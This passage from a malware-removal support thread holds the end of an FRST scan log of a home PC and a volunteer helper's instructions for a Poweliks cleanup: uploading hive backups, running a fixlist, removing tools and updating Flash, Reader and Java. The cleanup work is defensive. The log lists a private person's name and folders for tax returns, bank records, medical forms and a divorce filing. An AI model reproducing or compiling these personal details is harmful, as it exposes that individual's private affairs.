2014-07-07 22:27 - 2014-03-13 17:18 - 00000000 ____D () C:\Users\Ric\Documents\Charlotte Club Music Trivia
2014-07-07 22:27 - 2014-02-28 12:18 - 00000000 ____D () C:\Users\Ric\Documents\Water Oak Trivia
2014-07-07 22:27 - 2014-02-26 10:00 - 00000000 ____D () C:\Users\Ric\Documents\Bingo Card Diagrams
2014-07-07 22:27 - 2014-02-24 09:23 - 00000000 ____D () C:\Users\Ric\Documents\2013 Tax Return Package Orlando
2014-07-07 22:27 - 2014-02-13 10:47 - 00000000 ____D () C:\Users\Ric\Documents\Celebration Athletes app licationRicMitchellw92013
2014-07-07 22:27 - 2013-12-19 13:03 - 00000000 ____D () C:\Users\Ric\Documents\2013 Tax Package Orlando
2014-07-07 22:27 - 2013-09-24 12:02 - 00000000 ____D () C:\Users\Ric\AppData\Local\CE614ED5-C555-4E18-B719-E22F8ED8BAE5.aplzod
2014-07-07 22:27 - 2013-08-04 14:51 - 00000000 ____D () C:\Users\Ric\Documents\POLO RIDGE TRIVIA
2014-07-07 22:27 - 2013-08-04 14:51 - 00000000 ____D () C:\Users\Ric\Documents\MALLORY TRIVIA
2014-07-07 22:27 - 2013-08-04 14:51 - 00000000 ____D () C:\Users\Ric\Documents\Citrus Hill Music File questions
2014-07-07 22:27 - 2013-06-02 16:22 - 00000000 ____D () C:\Users\Ric\Documents\Landale Hanlon Trivia Night 7-3-13
2014-07-07 22:27 - 2013-05-30 09:19 - 00000000 ____D () C:\Users\Ric\AppData\Local\Amazon Cloud Player
2014-07-07 22:27 - 2013-05-23 17:28 - 00000000 ___HD () C:\ProgramData\CanonBJ
2014-07-07 22:27 - 2013-04-12 17:36 - 00000000 ____D () C:\Users\Ric\Documents\Trivia_Ladder_Trivia_Sets
2014-07-07 22:27 - 2013-03-26 09:18 - 00000000 ____D () C:\Users\Ric\Documents\Theatre ALLBIOS
2014-07-07 22:27 - 2013-03-06 09:41 - 00000000 ____D () C:\Users\Ric\Documents\Sharon ApplicationforResidency
2014-07-07 22:27 - 2013-02-05 10:04 - 00000000 ____D () C:\Users\Ric\Documents\Ric Mitchell Q&A OnlineTriviaInsert
2014-07-07 22:27 - 2013-01-22 09:19 - 00000000 ___HD () C:\Users\Ric\Desktop\.picasaoriginals
2014-07-07 22:27 - 2012-12-11 08:53 - 00000000 ____D () C:\Users\Ric\Documents\2012 Tax Return and Packet
2014-07-07 22:27 - 2012-11-15 13:45 - 00000000 ____D () C:\Users\Ric\Documents\ACX
2014-07-07 22:27 - 2012-11-04 17:12 - 00000000 ____D () C:\Users\Ric\Documents\Scott Trivia Documnets
2014-07-07 22:27 - 2012-10-18 09:17 - 00000000 ____D () C:\Users\Ric\AppData\Local\Quicken WillMaker Plus 2013
2014-07-07 22:27 - 2012-08-30 09:24 - 00000000 ____D () C:\Users\Ric\Documents\Cathleen book IllustrationsSoFarLoRes
2014-07-07 22:27 - 2012-08-29 13:47 - 00000000 ____D () C:\Users\Ric\Documents\VillagesBacallRecinvoiceSockHop
2014-07-07 22:27 - 2012-08-27 09:01 - 00000000 ____D () C:\Users\Ric\Documents\Cigna Medical Forms
2014-07-07 22:27 - 2012-08-05 18:39 - 00000000 ____D () C:\Users\Ric\Documents\Amazon MP3
2014-07-07 22:27 - 2012-07-30 18:09 - 00000000 ____D () C:\Users\Ric\Documents\Cathleen book
2014-07-07 22:27 - 2012-06-17 15:48 - 00000000 ____D () C:\Users\Ric\Documents\TOPHITSOF1981
2014-07-07 22:27 - 2012-05-30 07:34 - 00000000 ____D () C:\Users\Ric\Documents\W-9 Form-2011 Blank
2014-07-07 22:27 - 2012-04-07 07:51 - 00000000 ____D () C:\Users\Ric\Documents\1940 UnitedStatesFederalCensus(Beta)
2014-07-07 22:27 - 2012-02-22 11:12 - 00000000 ____D () C:\Users\Ric\Documents\Moving notes
2014-07-07 22:27 - 2012-02-22 11:12 - 00000000 ____D () C:\Users\Ric\Documents\2011 Tax package Orlando
2014-07-07 22:27 - 2012-02-06 20:07 - 00000000 ____D () C:\Users\Ric\Documents\Drew Addtional files
2014-07-07 22:27 - 2012-01-26 10:23 - 00000000 ____D () C:\Users\Ric\Documents\Consumer Cellular
2014-07-07 22:27 - 2012-01-19 17:12 - 00000000 ____D () C:\Users\Ric\Documents\Daily Sun ads
2014-07-07 22:27 - 2012-01-14 13:54 - 00000000 ___SD () C:\Users\Ric\Documents\My Data Sources
2014-07-07 22:27 - 2012-01-11 10:45 - 00000000 ____D () C:\Users\Ric\Documents\Ameriprise statements
2014-07-07 22:27 - 2011-12-22 09:51 - 00000000 ____D () C:\Users\Ric\Documents\Rental lease 2
2014-07-07 22:27 - 2011-10-19 12:00 - 00000000 ____D () C:\Users\Ric\Desktop\TheGameShowManLogo1
2014-07-07 22:27 - 2011-10-13 12:24 - 00000000 ____D () C:\Users\Ric\AppData\Local\Quicken WillMaker Plus 2012
2014-07-07 22:27 - 2011-09-03 09:39 - 00000000 ____D () C:\Users\Ric\Documents\Amazon MP3 Uploader
2014-07-07 22:27 - 2011-08-17 16:07 - 00000000 ____D () C:\Users\Ric\Documents\2009D'AMICO tax return
2014-07-07 22:27 - 2011-03-13 15:17 - 00000000 ____D () C:\Users\Ric\Documents\skoop special
2014-07-07 22:27 - 2011-03-10 16:09 - 00000000 ____D () C:\Users\Ric\AppData\Local\Broderbund Software
2014-07-07 22:27 - 2011-03-05 14:00 - 00000000 ___RD () C:\Users\Ric\Documents\My Dropbox
2014-07-07 22:27 - 2011-03-05 14:00 - 00000000 ____D () C:\Users\Ric\Documents\BlackBerry
2014-07-07 22:27 - 2011-03-05 14:00 - 00000000 ____D () C:\Users\Ric\Desktop\Website text and files
2014-07-07 22:27 - 2011-03-05 13:46 - 00000000 ____D () C:\Users\Ric\Carbonite Restored OLD User Settings
2014-07-07 22:27 - 2011-03-05 13:46 - 00000000 ____D () C:\Users\Public\Documents\yoostar
2014-07-07 22:27 - 2011-03-03 17:13 - 00000000 ____D () C:\Users\Ric\Documents\DAmico-Fitzgerald Tax Return 2010
2014-07-07 22:27 - 2011-03-01 14:05 - 00000000 ____D () C:\Users\Ric\Documents\Ric Mary Pics
2014-07-07 22:27 - 2011-02-28 18:19 - 00000000 ____D () C:\Users\Ric\Documents\skoop
2014-07-07 22:27 - 2011-02-28 09:14 - 00000000 ____D () C:\ProgramData\McAfee
2014-07-07 22:27 - 2011-02-27 20:26 - 00000000 ____D () C:\Users\Ric\AppData\Local\CatalystMC
2014-07-07 22:27 - 2011-02-27 19:46 - 00000000 ____D () C:\ProgramData\PhotoShow Shared Assets
2014-07-07 22:27 - 2011-02-27 15:24 - 00000000 ____D () C:\Users\Ric\Documents\Dell WebCam Central
2014-07-07 22:27 - 2011-02-26 18:06 - 00000000 ____D () C:\Users\Ric\Documents\Bank of America
2014-07-07 22:27 - 2011-02-26 17:49 - 00000000 ___RD () C:\Users\Ric\Dropbox
2014-07-07 22:27 - 2011-02-26 17:45 - 00000000 ____D () C:\ProgramData\Intuit
2014-07-07 22:27 - 2011-02-26 14:13 - 00000000 ____D () C:\Users\Ric\AppData\Local\AOL
2014-07-07 22:27 - 2011-02-26 13:26 - 00000000 ____D () C:\Users\Ric\Documents\Outlook Files
2014-07-07 22:27 - 2011-02-26 01:39 - 00000000 ____D () C:\ProgramData\Logishrd
2014-07-07 22:27 - 2011-02-26 01:21 - 00000000 ____D () C:\Users\Ric\Documents\Adobe
2014-07-07 22:27 - 2011-02-26 00:59 - 00000000 ____D () C:\Users\Public\Documents\Adobe
2014-07-07 22:27 - 2011-02-26 00:34 - 00000000 ____D () C:\Users\Ric\AppData\Local\Apple Computer
2014-07-07 12:45 - 2014-02-06 09:50 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\vlc
2014-07-07 12:45 - 2011-09-03 09:39 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\com.amazon.music.uploader
2014-07-07 12:45 - 2011-05-25 13:27 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Dell
2014-07-07 12:45 - 2011-03-01 17:08 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\eFax Messenger
2014-07-07 12:45 - 2011-02-27 20:00 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Roxio
2014-07-07 12:45 - 2011-02-26 17:47 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Dropbox
2014-07-07 12:45 - 2011-02-26 17:46 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Intuit
2014-07-07 12:45 - 2011-02-26 17:44 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Tether
2014-07-07 12:45 - 2011-02-26 16:55 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Real
2014-07-07 12:45 - 2011-02-26 14:38 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\PACE Anti-Piracy
2014-07-07 12:45 - 2011-02-26 00:09 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\PCDr
2014-07-07 12:42 - 2013-05-25 14:16 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\ArcSoft
2014-07-07 12:42 - 2013-05-23 17:51 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\canon
2014-07-07 12:42 - 2011-04-04 11:35 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Amazon
2014-07-07 12:42 - 2011-02-26 00:45 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Adobe
2014-07-07 12:42 - 2011-02-26 00:34 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Apple Computer
2014-07-07 12:19 - 2011-02-27 10:02 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1
2014-07-06 14:15 - 2014-07-06 14:15 - 00000000 ____D () C:\Users\Ric\AppData\Local\GHISLER
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieUserList
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieSiteList
2014-07-06 13:39 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-07-06 11:46 - 2014-07-06 11:46 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-07-05 22:06 - 2014-07-05 22:06 - 00000000 ____D () C:\Users\roy\AppData\Local\GHISLER
2014-07-05 22:04 - 2014-07-05 22:04 - 00000736 _____ () C:\Users\Public\Desktop\Total Commander 64 bit.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000722 _____ () C:\Users\Public\Desktop\Total Commander.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total Commander
2014-07-05 14:46 - 2014-07-05 14:46 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Notepad++
2014-07-05 14:25 - 2014-07-05 14:25 - 00453480 _____ () C:\Users\roy\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-05 14:23 - 2014-07-05 14:23 - 00001417 _____ () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Apple Computer
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Adobe
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Local\Google
2014-07-05 14:22 - 2014-07-05 14:22 - 00000020 ___SH () C:\Users\roy\ntuser.ini
2014-07-05 14:22 - 2014-07-05 14:22 - 00000000 ____D () C:\Users\roy\AppData\Local\VirtualStore
2014-07-05 14:17 - 2014-01-08 09:57 - 00035352 _____ () C:\Users\Ric\Downloads\Jay and The Americans    March 2014.xls
2014-07-05 14:17 - 2011-10-24 12:08 - 01349912 _____ () C:\Users\Ric\Downloads\header.fla
2014-07-05 14:16 - 2013-07-26 15:28 - 00028952 _____ () C:\Users\Ric\Downloads\Garrett Miles MUSIC & MAYHEM   Sept 2013.xls
2014-07-05 14:16 - 2013-07-26 15:28 - 00028952 _____ () C:\Users\Ric\Downloads\Garrett Miles MUSIC & MAYHEM   Sept 2013 (1).xls
2014-07-05 13:53 - 2014-07-05 13:53 - 00139544 ____H () C:\Users\Ric\Downloads\Donna Summer - Last Dance.mp3.z1a
2014-07-05 13:53 - 2014-01-08 09:58 - 00028440 _____ () C:\Users\Ric\Downloads\Brooklyn Bridge the  March 2014.xls
2014-07-05 13:53 - 2014-01-08 09:58 - 00028440 _____ () C:\Users\Ric\Downloads\Brooklyn Bridge the  March 2014 (1).xls
2014-07-05 13:53 - 2011-03-09 16:32 - 00034328 _____ () C:\Users\Ric\Documents\watermark[540].tga
2014-07-05 13:53 - 2011-03-09 16:32 - 00018712 _____ () C:\Users\Ric\Documents\watermark[396].tga
2014-07-05 13:53 - 2011-03-09 16:32 - 00009752 _____ () C:\Users\Ric\Documents\watermark[288].tga
2014-07-05 13:49 - 2012-09-22 12:31 - 00022040 _____ () C:\Users\Ric\Documents\TOPHITSOF1973.xls
2014-07-05 13:49 - 2012-05-21 09:14 - 00023576 _____ () C:\Users\Ric\Documents\TOPHITSOF1968.xls
2014-07-05 13:49 - 2012-01-14 09:52 - 00009240 _____ () C:\Users\Ric\Documents\Team Trivia Board.xlsx
2014-07-05 13:49 - 2011-03-17 14:55 - 13156376 _____ () C:\Users\Ric\Documents\SUNY speech.pptx
2014-07-05 13:48 - 2012-05-28 07:48 - 00023576 _____ () C:\Users\Ric\Documents\SUMMERSONGS.xls
2014-07-05 13:48 - 2011-10-28 15:25 - 00039192 _____ () C:\Users\Ric\Documents\Star Phone Listing.xls
2014-07-05 13:48 - 2011-04-17 13:39 - 13158168 _____ () C:\Users\Ric\Documents\SUNY speech FINAL.pptx
2014-07-05 13:47 - 2012-08-04 13:59 - 00027416 _____ () C:\Users\Ric\Documents\ROOTSOFROCKNROLL.xls
2014-07-05 13:46 - 2011-09-21 17:53 - 00875288 _____ () C:\Users\Ric\Documents\Rickaraoketextfile.xls
2014-07-05 13:41 - 2012-09-23 13:25 - 08316373 ____T () C:\Users\Ric\Documents\Ric Pre Show Powerpoint.wmv
2014-07-05 13:41 - 2012-09-23 13:03 - 01148184 _____ () C:\Users\Ric\Documents\Ric Pre Show Powerpoint.pptx
2014-07-05 13:39 - 2013-08-24 17:25 - 00022552 _____ () C:\Users\Ric\Documents\PartyBaseVillages 2014.xlsx
2014-07-05 13:39 - 2013-05-15 10:02 - 00080920 _____ () C:\Users\Ric\Documents\PartyBaseVillages 2013-Part 2.xls
2014-07-05 13:39 - 2013-01-07 10:49 - 00082968 _____ () C:\Users\Ric\Documents\PartyBaseVillages 2012.xls
2014-07-05 13:39 - 2012-08-24 09:47 - 00012312 _____ () C:\Users\Ric\Documents\Red Hat.xlsx
2014-07-05 13:39 - 2012-04-24 11:46 - 00077080 _____ () C:\Users\Ric\Documents\PartyBaseVillages2.xls
2014-07-05 13:39 - 2012-01-06 10:55 - 00081944 _____ () C:\Users\Ric\Documents\PartyBaseVillages.xls
2014-07-05 13:39 - 2011-02-27 12:18 - 00407832 _____ () C:\Users\Ric\Documents\PartyBase.xlr
2014-07-05 13:36 - 2012-08-17 08:48 - 00013080 _____ () C:\Users\Ric\Documents\LadiesLuncheonRoster with birthdays.xlsx
2014-07-05 13:36 - 2012-08-16 11:09 - 00013336 _____ () C:\Users\Ric\Documents\LadiesLuncheonRoster.xlsx
2014-07-05 13:36 - 2012-07-03 17:35 - 00032792 _____ () C:\Users\Ric\Documents\Knott Take It Or Leave It.xlsx
2014-07-05 13:36 - 2012-07-03 16:54 - 00032536 _____ () C:\Users\Ric\Documents\Knott Blank amended Ric Trivia sheet for multiple teams-.xlsx
2014-07-05 13:36 - 2012-04-13 10:51 - 00012824 _____ () C:\Users\Ric\Documents\LadiesLuncheonRoster-04-12.xlsx
2014-07-05 13:36 - 2012-01-18 10:06 - 00056344 _____ () C:\Users\Ric\Documents\Knott Template blank Tamarind Grove GOOD TO GO large questions.xlsx
2014-07-05 13:36 - 2012-01-18 10:03 - 00056856 _____ () C:\Users\Ric\Documents\Knott Template blank trivia3 GOOD TO GO large questions.xlsx
2014-07-05 13:36 - 2012-01-18 09:58 - 00054040 _____ () C:\Users\Ric\Documents\Knott Template trivia3 GOOD TO GO large questions.xlsx
2014-07-05 13:36 - 2012-01-17 12:25 - 00033048 _____ () C:\Users\Ric\Documents\Knott amended Ric Trivia sheet for multiple teams.xlsx
2014-07-05 13:36 - 2012-01-17 12:20 - 00031256 _____ () C:\Users\Ric\Documents\Knott amended Ric Trivia sheet.xlsx
2014-07-05 13:36 - 2012-01-16 12:34 - 00014104 _____ () C:\Users\Ric\Documents\Knott Template trivia3 GOOD TO GO.xlsx
2014-07-05 13:36 - 2012-01-16 12:29 - 00013848 _____ () C:\Users\Ric\Documents\Knott Template trivia2.xlsx
2014-07-05 13:36 - 2012-01-16 11:55 - 00012056 _____ () C:\Users\Ric\Documents\Knott Template trivia.xlsx
2014-07-05 13:36 - 2011-08-22 18:43 - 00001304 _____ () C:\Users\Ric\Documents\Karaokesongrequestslip.txt
2014-07-05 13:36 - 2011-03-09 16:47 - 01051928 _____ () C:\Users\Ric\Documents\Karaoke text file.txt
2014-07-05 13:35 - 2014-01-24 11:53 - 51149806 _____ () C:\Users\Ric\Documents\GROWING UP BOOMER final Georgia Club.pptx
2014-07-05 13:35 - 2011-08-18 15:58 - 00001304 _____ () C:\Users\Ric\Documents\Karaoke song request slip.txt
2014-07-05 13:34 - 2014-01-24 12:52 - 51149780 _____ () C:\Users\Ric\Documents\GROWING UP BOOMER final Georgia Club extra.pptx
2014-07-05 13:33 - 2013-08-08 11:06 - 00001560 _____ () C:\Users\Ric\Documents\Game Show 5 Ric 3-2.txt
2014-07-05 13:32 - 2013-03-20 08:02 - 00010520 _____ () C:\Users\Ric\Documents\Disney Family Feud.xlsx
2014-07-05 13:32 - 2013-01-28 13:20 - 03211800 _____ () C:\Users\Ric\Documents\Ethics in Education.ppt
2014-07-05 13:32 - 2012-06-16 18:45 - 00015640 _____ () C:\Users\Ric\Documents\FATHER'SDAYSONGS.xls
2014-07-05 13:32 - 2012-02-16 10:48 - 00154136 _____ () C:\Users\Ric\Documents\Fast Money Round 2.xls
2014-07-05 13:32 - 2012-02-16 10:42 - 00032792 _____ () C:\Users\Ric\Documents\Fast Money Round.xls
2014-07-05 13:29 - 2012-06-11 17:12 - 00023064 _____ () C:\Users\Ric\Documents\CALENDARCLASSICS.xls
2014-07-05 13:29 - 2011-04-27 12:43 - 07028992 _____ () C:\Users\Ric\Documents\Bring a tear to my eye.wmv
2014-07-05 13:29 - 2011-02-26 20:26 - 11796504 _____ () C:\Users\Ric\Documents\capture.avi
2014-07-04 13:32 - 2014-07-04 13:27 - 20787200 _____ () C:\Users\Ric\qdata2010.QDF
2014-07-04 13:32 - 2011-02-28 08:03 - 00000000 ____D () C:\Users\Ric\BACKUP
2014-07-04 13:28 - 2014-07-04 04:19 - 20787200 _____ () C:\Users\Ric\Downloads\qdata2010 (1).qdf
2014-07-04 13:24 - 2014-07-04 04:24 - 00001120 _____ () C:\Users\Ric\Downloads\qdata2010 (1)OFXLOG.DAT
2014-07-04 04:56 - 2013-05-19 16:06 - 00039448 _____ () C:\Users\Ric\Documents\Belize The Top English Speaking Retirement Haven in the Caribbean.txt
2014-07-04 04:33 - 2013-03-21 13:45 - 03414552 _____ () C:\Users\Ric\Documents\ABCs.pps
2014-07-04 04:19 - 2014-07-04 04:19 - 20780389 _____ () C:\Users\Ric\Downloads\qdata2010 (2).qdf
2014-07-02 07:15 - 2014-07-02 07:15 - 00003288 _____ () C:\bootsqm.dat
2014-07-02 02:01 - 2014-06-05 11:17 - 00000000 ____D () C:\Users\Ric\AppData\Local\UQmedia
2014-07-01 22:43 - 2012-01-30 10:19 - 00054296 _____ () C:\Users\Ric\Desktop\Knott excel test.xlsx
2014-07-01 22:20 - 2014-05-15 09:09 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\DropboxMaster
2014-07-01 15:37 - 2013-05-23 17:24 - 00000000 ____D () C:\ProgramData\CanonIJPLM
2014-07-01 15:28 - 2014-06-25 19:23 - 20742144 _____ () C:\Users\Ric\Downloads\qdata2010.qdf
2014-07-01 15:27 - 2014-06-25 19:23 - 00000896 _____ () C:\Users\Ric\Downloads\qdata2010OFXLOG.DAT
2014-06-25 20:50 - 2014-06-25 20:26 - 00000961 ____H () C:\IPH.PH
2014-06-25 20:50 - 2011-02-26 14:14 - 00094197 _____ () C:\install.log
2014-06-25 20:20 - 2014-06-25 20:20 - 00208400 _____ (AOL LLC.) C:\Users\Ric\Downloads\AOLDNLD.exe
2014-06-25 20:13 - 2011-02-26 00:37 - 00002503 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safari.lnk
2014-06-25 19:30 - 2014-06-25 19:29 - 00369792 _____ () C:\Windows\Minidump\062514-34335-01.dmp
2014-06-25 19:22 - 2011-04-27 15:24 - 00463200 _____ () C:\Users\Ric\qdata2010OFXLOG.DAT
2014-06-24 13:11 - 2011-08-28 11:40 - 00003866 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA
2014-06-24 13:11 - 2011-08-28 11:40 - 00003470 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core
2014-06-24 13:10 - 2013-10-06 14:24 - 00003888 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-06-24 13:10 - 2013-10-06 14:24 - 00003636 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-06-23 19:05 - 2014-06-23 19:04 - 00370536 _____ () C:\Windows\Minidump\062314-33337-01.dmp
2014-06-20 21:40 - 2011-02-27 19:48 - 00000000 ____D () C:\ProgramData\Roxio
2014-06-20 21:32 - 2014-06-20 21:32 - 00000000 ____D () C:\Users\Ric\Documents\Roxio Projects
2014-06-19 10:21 - 2014-06-13 11:10 - 00000000 ____D () C:\Users\Ric\AppData\Local\Adobe
2014-06-18 16:45 - 2014-06-18 16:44 - 01051112 _____ () C:\Users\Ric\Documents\Divorce Civi lCover Sheet.zip
2014-06-18 16:32 - 2014-06-18 16:31 - 00378088 _____ () C:\Windows\Minidump\061814-37799-01.dmp
2014-06-18 16:20 - 2014-06-18 16:20 - 00262144 _____ () C:\Windows\Minidump\061814-48672-01.dmp
2014-06-18 09:49 - 2014-06-18 09:49 - 00000000 ____D () C:\ProgramData\Package Cache
2014-06-18 09:48 - 2014-06-18 09:48 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-06-18 09:47 - 2014-06-18 09:47 - 00000000 ____D () C:\AMD
2014-06-18 09:40 - 2014-06-18 09:39 - 00569856 _____ () C:\Windows\Minidump\061814-35069-01.dmp
2014-06-17 16:55 - 2014-06-17 16:54 - 00369840 _____ () C:\Windows\Minidump\061714-74116-01.dmp
2014-06-17 16:43 - 2014-06-17 16:42 - 00369808 _____ () C:\Windows\Minidump\061714-29546-01.dmp

Files to move or delete:
====================
C:\Users\Ric\qdata2010OFXLOG.DAT
C:\Users\Ric\qdata2010_OldSyncLog.dat
C:\Users\Ric\qdata2010_SyncLog.dat

Some content of TEMP:
====================
C:\Users\Ric\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp9nk2tx.dll
C:\Users\Ric\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpa4yjld.dll
C:\Users\Ric\AppData\Local\Temp\procexp64.exe

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-07-06 10:27

==================== End Of Log ============================



#14 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:05:05 PM

Posted 18 July 2014 - 02:04 AM

This is looking very good. I'm optimistic, too, that we got it. :)


Step 1

The author of Combofix has asked to upload some files so that he can analyze why Combofix didn't delete this infection and improve the detection. Thank you in advance for providing them as follows:
  • Please go to the directory C:\WINDOWS\erdnt\Hiv-backup.
  • Pack the folder Users to a zip archive (right click on it and choose Send to -> Compressed (zipped) folder).
  • Click here to upload this zip file to the author of Combofix:
    • Copy-paste the link to your topic into the respective text box.
    • Click on 'Browse', find and select the zip file you've just created and click 'Open'.
    • Write "Poweliks - User Hives" into the comments textbox.
    • Click on 'Send File'


Step 2

Please download this attached Attached File  fixlist.txt   34bytes   10 downloads and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • I don't need the log.



That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody.
If you want to support me fighting against malware or buy me a beer for the assistance you received, then you can consider a donation: btn_donate_SM.gif.
Thank you!



Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restorepoints:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Rename Combofix.exe in Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden. So don't add a double extension Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this malware exploits security holes in installed software (e.g. browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefor it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Adobe Flash Player 13 Plugin
Adobe Reader X (10.1.10)
Java 6 Update 27




Tips

I recommend to read and follow the "16 simple and easy ways to keep your computer safe and secure on the Internet" (Link) by Lawrence Abrams.

Edited by aharonov, 18 July 2014 - 03:09 AM.


#15 scooter2028

scooter2028
  • Topic Starter

  • Members
  • 15 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:05 AM

Posted 18 July 2014 - 10:47 AM

Status:

 

1. C:\WINDOWS\erdnt\Hiv-backup\Users >> Zipped and uploaded as specified.

2. FRST run with fixlog.txt as a 'Fix' task.

3. Beer contribution made.

 

Working on the rest.  More to follow.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users